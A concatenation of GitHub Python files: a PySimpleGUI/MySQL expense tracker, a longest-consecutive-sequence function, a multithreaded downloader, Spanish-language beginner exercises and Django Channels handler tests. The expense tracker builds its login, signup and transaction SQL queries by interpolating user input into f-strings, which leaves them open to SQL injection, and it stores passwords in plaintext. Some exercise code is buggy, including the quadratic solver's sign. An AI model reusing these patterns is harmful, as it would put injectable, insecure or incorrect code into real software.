Database\n\n\ndef check_login_info(User: str, Pass: str) -> bool:\n cursor = conn.cursor()\n\n try:\n cursor.execute(f\"\"\"\n SELECT username, passwd\n FROM users\n WHERE username = '{User}' AND passwd = '{Pass}';\n \"\"\")\n\n result = cursor.fetchone()\n if result not in [[], None, [()]]:\n return True\n\n else:\n return False\n\n except ConnectionError:\n Popup(\"Error Connecting to Database.\",\n \"Please try again or restart the program\")\n except SQLErrors.ProgrammingError:\n PopupError(\"ERROR: Invalid credentials.\", \"Try again\")\n cursor.close()\n\n\ndef create_account(u: Union[str, int], p: Union[str, int], e: Union[str, int], f: str, l: str) -> None:\n cursor = conn.cursor()\n\n e = 'NULL' if e in (None, '') else e\n\n try:\n '''\n Creates a new entry in the db.\n Required two cases as the email field is optional\n '''\n if e != 'NULL':\n cursor.execute(f\"\"\"\n INSERT INTO users (username,passwd,email_id,first_name,last_name)\n VALUES ('{u}','{p}','{e}','{f}','{l}');\n \"\"\")\n else:\n cursor.execute(f\"\"\"\n INSERT INTO users (username,passwd,email_id,first_name,last_name)\n VALUES ('{u}','{p}',{e},'{f}','{l}');\n \"\"\")\n\n conn.commit()\n\n except ConnectionError:\n Popup(\"Error Connecting to Database.\",\n \"Please try again or restart the program\")\n\n cursor.close()\n\n\ndef get_income_and_expense(user: str) -> Tuple[float, float]:\n cursor = conn.cursor()\n cursor.execute(f\"\"\"\n SELECT SUM(amount)\n FROM transactions\n WHERE\n exp_date BETWEEN '{year}-{month}-01' AND '{year}-{month}-{days_in_month}'\n AND exp_type = 'CR'\n AND username = '{user}';\"\"\")\n\n try:\n income = cursor.fetchone()[0]\n if income == None:\n income = 0\n except TypeError:\n print(\"No records found. Setting income to None\")\n income = None\n\n cursor.execute(f\"\"\"\n SELECT SUM(amount)\n FROM transactions\n WHERE\n exp_date BETWEEN '{year}-{month}-01' AND '{year}-{month}-{days_in_month}'\n AND exp_type = 'DR'\n AND username = '{user}';\"\"\")\n\n try:\n expense = cursor.fetchone()[0]\n if expense == None:\n expense = 0\n\n except TypeError:\n print(\"No records found. 
Setting expense to None\")\n expense = None\n\n cursor.close()\n\n return (income, expense)\n\n\ndef get_user_details(user: str) -> List[str]:\n cursor = conn.cursor()\n\n cursor.execute(f\"\"\"\n SELECT user_id,username,passwd,email_id,first_name,last_name\n FROM users\n WHERE username = '{user}';\n \"\"\")\n\n user_details = cursor.fetchall()[0]\n\n cursor.close()\n\n return user_details\n\n\ndef username_used(user: str) -> bool:\n cursor = conn.cursor()\n\n cursor.execute(f\"\"\"\n SELECT COUNT(username) FROM users\n WHERE username = '{user}';\n \"\"\")\n\n user_count = cursor.fetchone()[0]\n print(f\"No. of users with username {user} = {user_count}\")\n if user_count != 0:\n return True\n else:\n return False\n\n\ndef get_transactions(user: Union[str, int],\n n: int = 10000,\n start_date: str = f\"{year}-{month}-1\",\n end_date: str = f\"{year}-{month}-{day}\",\n asc_or_desc: str = \"ASC\",\n orderer: str = \"particulars\") -> List[Tuple]:\n headings = [\n \"Particulars\",\n \"Type\",\n \"Amount\",\n \"Date\"\n ]\n\n cursor = conn.cursor()\n\n where_clause_part_1 = f\"username = '{user}'\" if type(\n user) is str else f\"user_id = {user}\"\n where_clause = where_clause_part_1 + f\"\"\"\n AND\n exp_date BETWEEN '{start_date}' AND '{end_date}'\n ORDER BY {orderer} {asc_or_desc}\n \"\"\"\n\n # <------------ Counts number of transactions falling into the requirements and returns them to the slider ----------------> #\n query = f\"\"\"\n SELECT COUNT(*)\n FROM transactions\n WHERE {where_clause};\n \"\"\"\n cursor.execute(query)\n\n number_of_records = cursor.fetchone()[0]\n\n cursor.reset()\n\n query = f\"\"\"\n SELECT particulars,exp_type,amount,exp_date\n FROM transactions\n WHERE {where_clause}\n \"\"\"\n\n if number_of_records < n:\n limit = f\" LIMIT {number_of_records};\"\n else:\n limit = f\" LIMIT {n};\"\n\n cursor.execute(query+limit)\n\n transactions: List[Tuple] = cursor.fetchall()\n print(transactions)\n trans_table = Table(transactions, headings, key=\"table\", right_click_menu=[\"Options\", [\n \"Edit\", \"Delete\"]], enable_events=True) if number_of_records != 0 else Table([\"No records to display\"], headings=[\" \"*50], key=\"table\")\n\n return transactions, trans_table, number_of_records\n\n\n# <-------------------- PyPlot -------------------------> #\ndef get_graph_values(start_date: str = f\"{year}-{month}-1\",\n end_date: str = f\"{year}-{month}-{day}\",\n exp_type: str = \"All\"\n ):\n\n global graph_active\n\n cursor = conn.cursor()\n q_cr = f\"\"\"\n SELECT particulars,amount,DAY(exp_date)\n FROM transactions\n WHERE\n exp_date BETWEEN \"{start_date}\" AND \"{end_date}\"\n AND exp_type = \"CR\"\n ORDER BY exp_date;\n \"\"\"\n\n q_dr = f\"\"\"\n SELECT particulars,amount,DAY(exp_date)\n FROM transactions\n WHERE\n exp_date BETWEEN \"{start_date}\" AND \"{end_date}\"\n AND exp_type = \"DR\"\n ORDER BY exp_date;\n \"\"\"\n\n def plot_graphs():\n if exp_type == 'Credit':\n q = q_cr\n elif exp_type == 'Debit':\n q = q_dr\n elif exp_type == 'All':\n q1 = q_cr\n q2 = q_dr\n \n x = np.arange(1, days_in_month)\n\n plt.xticks(np.arange(1,days_in_month+1),range(1,days_in_month+1))\n\n if exp_type in (\"Credit\", \"Debit\"):\n cursor.execute(q)\n points = cursor.fetchall()\n \n x = np.array([point[2] for point in points])\n y = np.array([point[1] for point in points])\n \n plt.plot(x, y, marker = \"o\",label=exp_type)\n\n plt.grid(True)\n else:\n # <------- Credit -------> #\n cursor.execute(q1)\n points_1 = cursor.fetchall()\n x1 = np.array([point[2] for point in points_1]) # 
Dates\n y1 = np.array([point[1] for point in points_1]) # Amount\n\n cursor.reset()\n\n # <------- Debit -------> #\n cursor.execute(q2)\n points_2 = cursor.fetchall()\n\n x2 = np.array([point[2] for point in points_2])\n y2 = np.array([point[1] for point in points_2])\n\n plt.plot(x1, y1, marker=\"o\", label=\"Credit\")\n plt.plot(x2, y2, marker=\"x\", label=\"Debit\")\n\n plt.grid(True)\n\n plt.title(f\"Report for the month of {month_name}-{year}\")\n plt.legend()\n\n fig = plt.gcf() # gcf -> get current figure #\n fig_x, fig_y, fig_w, fig_h = fig.bbox.bounds\n return fig, fig_w, fig_h\n # q_all = f\"\"\"\n # SELECT particulars,amount,DAY(exp_date) \n # FROM transactions \n # WHERE \n # exp_date BETWEEN \"{start_date}\" AND \"{end_date}\" \n # ORDER BY exp_date;\n # \"\"\"\n if not graph_active:\n return plot_graphs()\n\n else:\n # plt.clf()\n\n return plot_graphs()\n # graph_active = True\n\n cursor.close()\n\n# <------------------------------- Beginning of Matplotlib helper code -----------------------> #\n# <----- Taken from https://github.com/PySimpleGUI/PySimpleGUI/blob/master/DemoPrograms/Demo_Matplotlib.py -----> #\n\n\ndef draw_figure(canvas, figure, loc=(0, 0)):\n figure_canvas_agg = FigureCanvasTkAgg(figure, canvas)\n figure_canvas_agg.draw()\n figure_canvas_agg.get_tk_widget().pack(side='top', fill='both', expand=1)\n return figure_canvas_agg\n\n\ndef delete_figure_agg(figure_agg):\n figure_agg.get_tk_widget().forget()\n plt.close('all')\n\n# <----------------------- GUI -----------------------------> #\n\n# ________ ___ ___ ___\n# |\\ ____\\|\\ \\|\\ \\|\\ \\\n# \\ \\ \\___|\\ \\ \\\\\\ \\ \\ \\\n# \\ \\ \\ __\\ \\ \\\\\\ \\ \\ \\\n# \\ \\ \\|\\ \\ \\ \\\\\\ \\ \\ \\\n# \\ \\_______\\ \\_______\\ \\__\\\n# \\|_______|\\|_______|\\|__|\n\n\n'''\nWhy am I using a class to store all my GUI functions?\n\n-> So that I could use locally created values like vals and user_details within other functions\n and to prevent me from getting a headache while managing scopes.\n\nNo, seriously though, making an object really helps while handling local objects as globals, making the programming\nenjoyable and painless.\n'''\n\n\nclass Xpnsit:\n \n def __init__(self):\n self.app_state: bool = True\n # <------------------- Misc. 
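
get_graph_values above plots one point per transaction, so two expenses on the same day show up as two separate markers at the same x position. Summing per day first gives a cleaner series; a sketch over the (particulars, amount, day) rows those queries fetch:

from collections import defaultdict

def daily_totals(rows):
    # rows are (particulars, amount, day_of_month) tuples, as fetched above
    totals = defaultdict(float)
    for _particulars, amount, day in rows:
        totals[day] += float(amount)
    days = sorted(totals)
    return days, [totals[day] for day in days]
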
Functions (Layouts and Updaters and stuff) --------------------> #\n\n def Add_Trans(self, particulars: str, _type: str, amount: float, date: str):\n cursor = conn.cursor()\n\n try:\n cursor.execute(f\"\"\"\n INSERT INTO transactions (\n user_id,\n username,\n particulars,\n exp_type,\n amount,\n exp_date\n )\n VALUES (\n {self.user.user_id},\n '{self.user.uname}',\n '{particulars}',\n '{_type}',\n {amount},\n \"{date}\"\n );\n \"\"\")\n\n conn.commit()\n\n Popup(\"Transaction successfully added.\")\n self.win.Refresh()\n\n except SQLErrors.ProgrammingError:\n PopupError(\"ERROR: Invalid details.\\nRectify and try again.\")\n\n cursor.close()\n\n def Create_Add_Trans_Layout(self):\n layout = [\n [T(\"New Transaction\", font=(\"Helvetica\", 18))],\n [T(\"NOTE:\", font=(\"Helvetica\", 20)), T(\n \"All fields are required to be filled.\")],\n [T(\"Particulars:\"), Multiline(\"Enter details of transaction\",\n autoscroll=True, key=\"Particulars\")],\n [T(\"Transaction type:\"), Combo([\"Select\", \"Credit\", \"Debit\"],\n \"Select\", readonly=True, key=\"new_type\")],\n [T(\"Amount:\"), Input(enable_events=True, key=\"amount\")],\n [T(\"Date Of Transaction:\"), Input(\"YYYY-MM-DD or use the button on the right\",\n key=\"date\"), CalendarButton(\"Select Date\", target=\"date\", format=\"%Y-%m-%d\")],\n [Submit()]\n ]\n\n return layout\n\n def History(self):\n history_values, table, no_of_records = get_transactions(\n self.user.uname)\n\n self.slider = sg.Slider(\n range=(0, no_of_records),\n default_value=no_of_records,\n orientation='h',\n enable_events=True,\n key='slider'\n )\n\n layout = [\n [T(\"Transaction History\", font=(\"Helvetica\", 18))],\n [T(\"All your transactions, in one place. Right click any one to delete or edit it.\")],\n [T('Number of records to be shown:'), self.slider],\n [T(\"Show records from \"),\n Input(f\"{year}-{month}-1\", key=\"start_date\", size=(10, 1)),\n CalendarButton(\"Start date\", target=\"start_date\", default_date_m_d_y=(\n month, 1, year), button_color=(\"white\", \"green\"), format=\"%Y-%m-%d\"),\n T(\"to\"),\n Input(f\"{year}-{month}-{day}\", key=\"end_date\", size=(10, 1)),\n CalendarButton(\"End date\", target=\"end_date\", default_date_m_d_y=(\n month, day, year), button_color=(\"white\", \"red\"), format=\"%Y-%m-%d\")\n ],\n [T(\"Type:\"), Combo([\"All\", \"Credit\", \"Debit\"],\n default_value=\"All\", key=\"used_type\", readonly=True)],\n [T(\"Sort by:\"), Combo([\"Name\", \"Amount\", \"Date of Transaction\"],\n default_value=\"Name\", key=\"sort_by\", readonly=True), Combo([\"Ascending\", \"Descending\"], default_value=\"Ascending\", key=\"asc_or_desc\", readonly=True)],\n [table, Button(\"Refresh\", button_color=(\n \"white\", \"orange\"), bind_return_key=True, key=\"refresh\")],\n\n\n ]\n self.history_active = True\n\n return layout\n\n def update_table(self):\n start, end = self.values['start_date'], self.values[\"end_date\"]\n aod = 'ASC' if self.values[\"asc_or_desc\"] == \"Ascending\" else \"DESC\"\n sort = \"particulars\" if self.values[\"sort_by\"] == \"Name\" else \"amount\" if self.values[\"sort_by\"] == \"Amount\" else \"exp_date\"\n n = self.values[\"slider\"] if self.event == 'slider' else 10000\n new_trans, new_table, new_number_of_trans = get_transactions(\n self.user.user_id,\n int(n),\n start,\n end,\n aod, # a(scending)o(r)d(escending)\n sort\n )\n print(new_trans, new_table, new_number_of_trans)\n\n self.win[\"table\"].Update(new_trans) # Updates table\n\n # Updates max number of records to be possibly displayed\n 
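
Add_Trans below sends whatever sits in the free-text date field straight into the INSERT, so a typo produces a cryptic MySQL error. Validating against the YYYY-MM-DD convention the form already advertises is cheap; a sketch:

import datetime

def valid_date(text):
    # True only for well-formed YYYY-MM-DD strings such as '2020-01-31'
    try:
        datetime.datetime.strptime(text, "%Y-%m-%d")
        return True
    except ValueError:
        return False
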
self.win[\"slider\"].Update(range=(0, new_number_of_trans+1))\n\n # Updates the default value of the slider to be the max\n self.slider.Update(value=new_number_of_trans)\n\n self.win.Refresh()\n\n def create_graph(self):\n\n fig, w, h = get_graph_values(\n self.values['a_start_date'],\n self.values['a_end_date'],\n self.values[\"a_type\"],\n )\n self.figure_agg = draw_figure(\n self.win['canvas'].TKCanvas, fig)\n # <------------------ Main Screens --------------------> #\n\n def Login(self):\n login_active = True\n layout = [\n [T(\"Xpnsit\", **heading_format)],\n [T(\"Username:\"), Input(key=\"user\")],\n [T(\"Password:\"), Input(key=\"pass\", password_char='*')],\n [Button(\"Login\", bind_return_key=True), Button(\"Signup\")]\n ]\n\n win = Window(\"Xpnsit\", layout=layout)\n\n while login_active: # <------------ Event Loop -----------------> #\n event, values = win.Read()\n\n if event is None:\n print(\"Exiting event loop\")\n login_active = False\n self.app_state = False\n win.close()\n del win\n break\n\n if event == \"Login\":\n success = check_login_info(values[\"user\"], values[\"pass\"])\n\n if success == True:\n print(\"Login Successful.\")\n\n self.user_details = get_user_details(values[\"user\"])\n self.user = NewUser(*self.user_details)\n\n win.close()\n\n self.Interface()\n login_active = False\n else:\n PopupError(\n \"ERROR: Username or password incorrect.\\nPlease try again.\")\n\n if event == \"Signup\":\n self.Signup()\n\n def Signup(self):\n signup_active = True\n\n layout = [\n [T(\"Signup for Xpnsit\", **heading_format), ],\n [T(\"First Name:\"), Input(size=(15, 1), key=\"f_name\"), T(\n \" \"), T(\"Last Name:\"), Input(size=(15, 1), key=\"l_name\")],\n [T(\"Username:\", justification='center'),\n Input(size=(35, 1), key=\"user\")],\n [T(\"Password:\", justification='center'), Input(\n size=(35, 1), key=\"pass\", password_char=\"*\")],\n [],\n [T(' '*40), Submit()]\n ]\n\n signup_win = Window(\"Xpnsit - Signup\", layout=layout)\n\n while signup_active: # <------------ Event Loop -----------------> #\n event, values = signup_win.Read()\n\n if event in (None, 'Exit'):\n signup_active = False\n login_active = True\n\n if event == 'Submit':\n self.vals = [values[\"user\"], values[\"pass\"],\n values[\"mail\"], values[\"f_name\"], values[\"l_name\"]]\n if not username_used(self.vals[0]):\n create_account(*self.vals)\n\n # <------------------- Confirmation of Insertion ------------------> #\n success = check_login_info(values[\"user\"], values[\"pass\"])\n\n if success == True:\n print(\"Signup Successful.\")\n Popup(\n \"Signup Successful!\",\n \"Exit this popup to return to the login page\"\n )\n signup_win.close()\n signup_active = False\n login_active = True\n else:\n PopupError(\"ERROR: Username already in usage\",\n title=\"Username already taken\")\n\n def Dashboard(self):\n income, expenses = get_income_and_expense(self.user.uname)\n\n if (income, expenses) == (None, None):\n dash_layout = [\n [T(f\"Welcome {self.user.first_name}\")],\n [T(\"Looks like you have no transactions!\\nGo add one in the Transactions tab.\",\n justification=\"center\")],\n [T(\"-\"*60, text_color=\"gray\")],\n ]\n else:\n dash_layout = [\n [T(f\"Welcome {self.user.first_name}\")],\n [T(f\"Your expenses for {month_name}-{year} are:\"),\n T(str(expenses), font=(\"Arial\", 20))],\n [T(f\"Your income for {month_name}-{year} is:\"),\n T(str(income), font=(\"Arial\", 20))],\n [T(\"-\"*80, text_color=\"gray\")],\n [T(\"Net Profit/Loss:\", font=(\"Segoe\", 18)),\n T(str(income-expenses), 
font=(\"Arial\", 24))]\n ]\n\n dash_active = True\n\n return dash_layout\n\n def Transactions(self):\n transaction_layout = [\n [T(\"Transactions\", font=(\"Helvetica\", 18))],\n [TabGroup(\n [\n [Tab(\"New Transaction\", self.Create_Add_Trans_Layout())],\n [Tab(\"History\", self.History())]\n ]\n )]\n ]\n\n return transaction_layout\n\n def Analytics(self):\n fig, w, h = get_graph_values()\n\n\n analysis_layout = [\n [T(\"Analytics\", font=(\"Helvetica\", 18))],\n [T(\"Here you can find and generate graphs for your desired timeframe\\nand observe trends in your balance.\")],\n [T(\"Generate for records from \"),\n Input(f\"{year}-{month}-1\", key=\"a_start_date\", size=(10, 1)),\n CalendarButton(\"Start date\", target=\"a_start_date\", default_date_m_d_y=(\n month, 1, year), button_color=(\"white\", \"green\"), format=\"%Y-%m-%d\"),\n T(\"to\"),\n Input(f\"{year}-{month}-{day}\", key=\"a_end_date\", size=(10, 1)),\n CalendarButton(\"End date\", target=\"a_end_date\", default_date_m_d_y=(\n month, day, year), button_color=(\"white\", \"red\"), format=\"%Y-%m-%d\")\n ],\n [T(\"Type:\"), Combo([\"All\", \"Credit\", \"Debit\"],\n default_value=\"All\", key=\"a_type\", readonly=True)],\n [Button(\"Generate\", button_color=(\"white\", \"orange\"))],\n [Canvas(size=(w, h), key=\"canvas\")]\n ]\n\n return analysis_layout\n\n def Interface(self):\n global graph_active\n\n\n layout = [\n [T(\"Xpnsit\", **heading_format), T(\" \"*50), Button(\"Settings\"),\n Button(\"Log Out\", button_color=(\"black\", \"yellow\"))],\n [TabGroup([\n [\n Tab(\"Dashboard\", self.Dashboard(\n ), tooltip=\"See an overview of your account\", font=(\"Arial\", 12)),\n Tab(\"Transactions\", self.Transactions(\n ), tooltip=\"View,add and delete transactions\", font=(\"Arial\", 12), key=\"transactions\"),\n Tab(\"Analytics\", self.Analytics(\n ), tooltip=\"Get a graphical insight to your spendings.\", font=(\"Arial\", 12))\n ]\n ],)]\n ]\n\n self.win = Window(\"Xpnsit v1.0\", layout=layout, size = (590,640),resizable=True)\n while True:\n self.event, self.values = self.win.Read()\n self.figure_agg = self.create_graph()\n\n if self.event == \"Log Out\":\n logout = PopupYesNo(\"Are you sure you want to log out?\")\n\n if logout == 'Yes':\n sg.popup_quick_message(\n \"Okay, closing. 
Bye\", auto_close_duration=10)\n self.win.close()\n # self.app_state = False\n del self.win\n break\n elif self.event is None:\n self.win.close()\n self.app_state = False\n del self.win\n break\n\n if self.event != sg.TIMEOUT_KEY:\n print(f\"Event = {self.event}\\nValues = {self.values}\\n\")\n\n\n if self.event == \"Submit\":\n _type = \"CR\" if self.values[\"new_type\"] in (\n \"Credit\", \"Select\") else \"DR\"\n self.Add_Trans(\n self.values[\"Particulars\"],\n _type,\n self.values[\"amount\"],\n self.values[\"date\"])\n\n if self.event in (\"slider\", \"refresh\"):\n\n self.update_table()\n self.win.refresh()\n\n if self.event == \"Generate\":\n # self.create_graph()\n delete_figure_agg(self.figure_agg)\n self.create_graph()\n self.win.read()\n self.win.refresh()\n # elif self.event == \"Generate\" and self.figure_agg:\n # canvas = self.win['canvas'].TKCanvas\n\n \n\n # canvas.delete(\"all\")\n # self.win.refresh()\n\n\n\nclass NewUser:\n def __init__(self, *details):\n self.user_id: int = details[0]\n self.uname: str = details[1]\n self.mail_id: str = details[3]\n self.first_name: str = details[4]\n self.last_name: str = details[5]\n self.full_name: str = self.first_name + ' ' + self.last_name\n self.state: bool = True\n\n\n# <---------- MAIN: Calls an instance of the Xpnsit class and starts off with the Login page --------> #\n\nif __name__ == \"__main__\":\n main_win = Xpnsit()\n # app_state = main_win.app_state\n while True:\n print(main_win.app_state)\n if main_win.app_state == True:\n main_win.Login()\n else:\n break\n","repo_name":"kilacoda/Xpnsit","sub_path":"main_2.py","file_name":"main_2.py","file_ext":"py","file_size_in_byte":25072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14229318604","text":"def longestConsecutive(nums):\n nums.sort()\n n = len(nums)\n i = 0\n count = 1\n res = []\n print(nums)\n while i <= n - 2:\n while nums[i + 1] == nums[i] + 1 and (i <= n-2):\n i = i + 1\n count = count + 1\n res.append(count)\n count = 1\n i = i + 1\n return max(res)\n\nlongestConsecutive([0, 0, 1, 2, 3, 4, 5, 6, 7, 8])","repo_name":"Hrishi246/InterviewPractise","sub_path":"Misc/longConsecSeq.py","file_name":"longConsecSeq.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30136351090","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n# multi_thread_download.py\n\n\nimport os\nimport threading\nimport urllib.request\nimport urllib.error\nimport shutil\n\nimport utility\nfrom utility import get_file_size, split_file_size, split_file_name, append_file\n\nimport single_thread_download\nfrom single_thread_download import single_thread_download\n\n\n# 各个子线程下载自己负责的那部分内容\ndef sub_thread_download(url, file_name, begin, end):\n\treq = urllib.request.Request(url)\n\treq.add_header('Range', 'bytes=%d-%d' % (begin, end))\n\ttry:\n\t\twith urllib.request.urlopen(req) as response, open(file_name, 'wb') as out_stream:\n\t\t\tshutil.copyfileobj(response, out_stream)\n\texcept urllib.error.URLError as e:\n\t\tprint(e.errno, '\\n', e.reason, '\\n')\n\n\n# 多线程\ndef multi_thread_download(url, file_name=None, overwrite=False, thread_num=4):\n\tif thread_num == 1:\n\t\tsingle_thread_download(url, file_name, overwrite)\n\telif thread_num > 1:\n\t\t# 如果文件名为空,则从 URL 中获取文件名\n\t\tif file_name is None:\n\t\t\tfile_name = url.rpartition('/')[-1]\n\t\t# 潜在 bug:如果不覆盖己有文件,而已有文件不完整(eg. 
没下载全),会有潜在影响\n\t\tif os.path.exists(file_name) and (not overwrite):\n\t\t\treturn\n\t\ttarget_size = get_file_size(url)\n\t\tif (target_size < 0):\n\t\t\tprint(\"multi_thread_download(): get_file_size() error!\\n\")\n\t\t\treturn\n\t\tranges = split_file_size(target_size, thread_num)\n\t\tthread_group = []\n\t\tfor i in range(thread_num):\n\t\t\t# print(i, '\\t', ranges[i][0], ',', ranges[i][1])\n\t\t\tt = threading.Thread(target=sub_thread_download, name=\"thread%d\" % i, args=(url, split_file_name(file_name, i), ranges[i][0], ranges[i][1]))\n\t\t\tt.start()\n\t\t\tthread_group.append(t)\n\t\tfor t in thread_group:\n\t\t\tt.join()\n\t\tappend_file(file_name, thread_num, False)\n\n\n# multi_thread_download(\"http://iweb.dl.sourceforge.net/project/zsh/zsh-doc/5.0.5/zsh-5.0.5-doc.tar.bz2\", overwrite=True, thread_num=4)\n# multi_thread_download(\"https://github.com/zeekvfu/sip_tea/archive/master.zip\", overwrite=True, thread_num=4)\n# multi_thread_download(\"http://screencasts.b0.upaiyun.com/podcasts/nil_podcast_1.m4a\", overwrite=False, thread_num=4)\n\n\n\n\n","repo_name":"zeekvfu/sip_tea","sub_path":"multi_thread_download.py","file_name":"multi_thread_download.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74868684000","text":"'''\nCreated on 13 dec. 2018\n\n@author: Iván\n'''\n\nimport math\n\n# Dada una altura pintar una piramide de asteriscos\nfrom builtins import range\n\nn = int(input(\"Introduce el numero de filas del triangulo: \"))\n\nfor i in range(n):\n espacios = n-i;\n print(\" \" * espacios + \"*\" *(i*2+1))\n\n# Pirámide invertida\n\nn = int(input(\"Introduce el numero de filas del triangulo invertido: \"))\n\nfor i in range(n-1 , -1 , -1):\n print(\" \" * (n-i) + \"*\" * (2*i+1))\n\n# Pintar un rombo\n\nnr = int(input(\"Tamaño del rombo: \"))\n\ndef rombo (n):\n for i in range(n):\n print(\" \" * (n-i) + \"*\" * (2*i+1))\n for i in range(n-2 , -1 , -1):\n print(\" \" * (n-i) + \"*\" * (2*i+1))\n\nrombo(nr)\n\n#Crear una función que devuelva el área de un rectángulo.\n\na = int(input(\"Introduce la base del rectangulo: \"))\nb = int(input(\"Introduce la altura del rectangulo: \"))\n\ndef areaR (a,b):\n return a*b\n\nprint(areaR(a,b))\n\n#– Crear una función que devuelva el perímetro de una circunferencia (utilizando math).\n\nradio = int(input(\"Introduce el radio de la circunferencia: \"))\n\ndef perimetro (r):\n return 2*math.pi*r\n\nprint(perimetro(radio))\n\n#Factorial de un numero\n\nfact = int(input(\"Introduce el numero del que quieres el factorial: \"))\n\ndef factorial (n):\n if n == 0 :\n return 1\n else:\n return n * factorial(n-1)\n\nprint(factorial(fact))\n\n# Crear una funcion que resuelve una ecuacion de segundo grado recibiendo a, b, c\n# B^2 +- 4ac / 2a raiz\n\ndef ecuacionSegundo (a,b,c):\n x = ((b**2 - (4 * a *c)))\n if x<0 :\n return print(\"No hay solucion, factores dentro de la raiz menores que 0\")\n elif x == 0:\n solucion = (-b) / (2*a)\n print(solucion)\n else:\n solucion1 = ((b) - math.sqrt(x) ) / (2*a)\n solucion2 = ((b) + math.sqrt(x) ) / (2*a)\n print(\"Solucion 1: \" + str(solucion1))\n print(\"Solucion 2: \" + str(solucion2))\n\na = int (input(\"Introduce el valor de a: \"))\nb = int (input(\"Introduce el valor de b: \"))\nc = int (input(\"Introduce el valor de c: \"))\necuacionSegundo(a, b, c)\n\n#Crear una función que devuelva una lista con los números primos de 0 a 100.\n\ndef isPrime (n):\n if n < 0 :\n return False\n elif n == 2:\n 
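# 2 is the only even prime, so it is handled before the trial-division loop\n        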
return True\n else:\n for i in range(2,n):\n if n % i == 0:\n return False\n return True\n\ndef primosLista ():\n l = []\n for i in range(2,100):\n if isPrime(i):\n l.append(i)\n\n return l\n\nprint(primosLista())\n\n\n#Dada una lista, imprimir los elementos en posición par.\n\ndef paresLista (l):\n for i in range(0,len(l), 2):\n print(\"Posicion par \" + str(i) + \": \" + str(l[i]))\n\nlista = [0,4,67,34,55,2,8,10]\nparesLista(lista)\n\n#Un número es perfecto si la suma de sus divisores es igual a si\n#mismo, ejemplo el 28. Crear una función que devuelva si un\n#número es perfecto.\n\ndef divisores (num):\n listaDiv = []\n for i in range(1,num): #Ojo que empezar en 1\n if ((num % i) == 0):\n listaDiv.append(i)\n return listaDiv\n\n\ndef perfecto (num):\n \"\"\"\n Comprueba si el numero es perfecto\n :param num: numero que comprobar\n :return: Perfecto o no\n \"\"\"\n listaAux = divisores(num)\n suma = 0\n for i in range(len(listaAux)):\n suma += listaAux[i]\n if (suma == num) :\n return print(\"Es perfecto\")\n else:\n return print(\"No es perfecto\")\n\ndef sumaL (l):\n suma = 0\n for i in range(len(l)):\n suma += l[i]\n return suma\n\ndef perfecto2 (n):\n l = []\n for i in range(1,n):\n if n % i == 0:\n l.append(i)\n if n == sumaL(l):\n return print(\"Es perfecto\")\n else:\n return print(\"No es perfecto\")\n\nperf = int(input(\"Introduzca el numero que desea comprobar si es perfecto: \"))\nperfecto(perf)\nprint(\"-\")\nperfecto2(perf)\n\n#Crear una función que recibe una lista de números y devuelve\n#una lista de tuplas por cada elemento. Cada tupla tendrá el\n#elemento, su cuadrado y su cubo:\n\ndef listaTuplas (listaN):\n listaF = []\n for i in listaN:\n tupla = (i , i**2 , i*i*i)\n listaF.append(tupla)\n print(listaF)\n\nlista2 = [1,2,3]\nlistaTuplas(lista2)\n\n# Hasta Slyce","repo_name":"IvanPerez9/Programming-Paradigms","sub_path":"Python/Repaso/Tema1/Tema1.py","file_name":"Tema1.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"es","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"72313782560","text":"from __future__ import unicode_literals\nfrom django.http import HttpResponse\n\nfrom channels import Channel\nfrom channels.handler import AsgiHandler\nfrom channels.tests import ChannelTestCase\n\n\nclass FakeAsgiHandler(AsgiHandler):\n \"\"\"\n Handler subclass that just returns a premade response rather than\n go into the view subsystem.\n \"\"\"\n\n chunk_size = 30\n\n def __init__(self, response):\n assert isinstance(response, HttpResponse)\n self._response = response\n super(FakeAsgiHandler, self).__init__()\n\n def get_response(self, request):\n return self._response\n\n\nclass HandlerTests(ChannelTestCase):\n \"\"\"\n Tests that the handler works correctly and round-trips things into a\n correct response.\n \"\"\"\n\n def test_basic(self):\n \"\"\"\n Tests a simple request\n \"\"\"\n # Make stub request and desired response\n Channel(\"test\").send({\n \"reply_channel\": \"test\",\n \"http_version\": \"1.1\",\n \"method\": \"GET\",\n \"path\": b\"/test/\",\n })\n response = HttpResponse(b\"Hi there!\", content_type=\"text/plain\")\n # Run the handler\n handler = FakeAsgiHandler(response)\n reply_messages = list(handler(self.get_next_message(\"test\", require=True)))\n # Make sure we got the right number of messages\n self.assertEqual(len(reply_messages), 1)\n reply_message = reply_messages[0]\n # Make sure the message looks correct\n self.assertEqual(reply_message[\"content\"], b\"Hi there!\")\n 
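# the 9-byte body fits inside the handler's 30-byte chunk size, so one message carries status and headers with no more_content flag\n        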
self.assertEqual(reply_message[\"status\"], 200)\n self.assertEqual(reply_message.get(\"more_content\", False), False)\n self.assertEqual(\n reply_message[\"headers\"],\n [(b\"Content-Type\", b\"text/plain\")],\n )\n\n def test_large(self):\n \"\"\"\n Tests a large response (will need chunking)\n \"\"\"\n # Make stub request and desired response\n Channel(\"test\").send({\n \"reply_channel\": \"test\",\n \"http_version\": \"1.1\",\n \"method\": \"GET\",\n \"path\": b\"/test/\",\n })\n response = HttpResponse(b\"Thefirstthirtybytesisrighthereandhereistherest\")\n # Run the handler\n handler = FakeAsgiHandler(response)\n reply_messages = list(handler(self.get_next_message(\"test\", require=True)))\n # Make sure we got the right number of messages\n self.assertEqual(len(reply_messages), 2)\n # Make sure the messages look correct\n self.assertEqual(reply_messages[0][\"content\"], b\"Thefirstthirtybytesisrighthere\")\n self.assertEqual(reply_messages[0][\"status\"], 200)\n self.assertEqual(reply_messages[0][\"more_content\"], True)\n self.assertEqual(reply_messages[1][\"content\"], b\"andhereistherest\")\n self.assertEqual(reply_messages[1].get(\"more_content\", False), False)\n\n def test_chunk_bytes(self):\n \"\"\"\n Makes sure chunk_bytes works correctly\n \"\"\"\n # Empty string should still return one chunk\n result = list(FakeAsgiHandler.chunk_bytes(b\"\"))\n self.assertEqual(len(result), 1)\n self.assertEqual(result[0][0], b\"\")\n self.assertEqual(result[0][1], True)\n # Below chunk size\n result = 